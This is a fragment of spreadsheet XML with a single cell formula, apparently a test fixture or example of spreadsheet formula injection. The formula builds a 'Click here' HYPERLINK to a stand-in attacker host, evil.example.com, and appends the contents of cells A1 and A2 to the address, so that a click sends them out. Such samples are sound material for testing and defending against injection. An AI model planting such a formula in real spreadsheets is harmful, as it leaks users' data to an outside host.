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>
        <f>HYPERLINK("https://evil.example.com/?d="&amp;A1&amp;A2,"Click here")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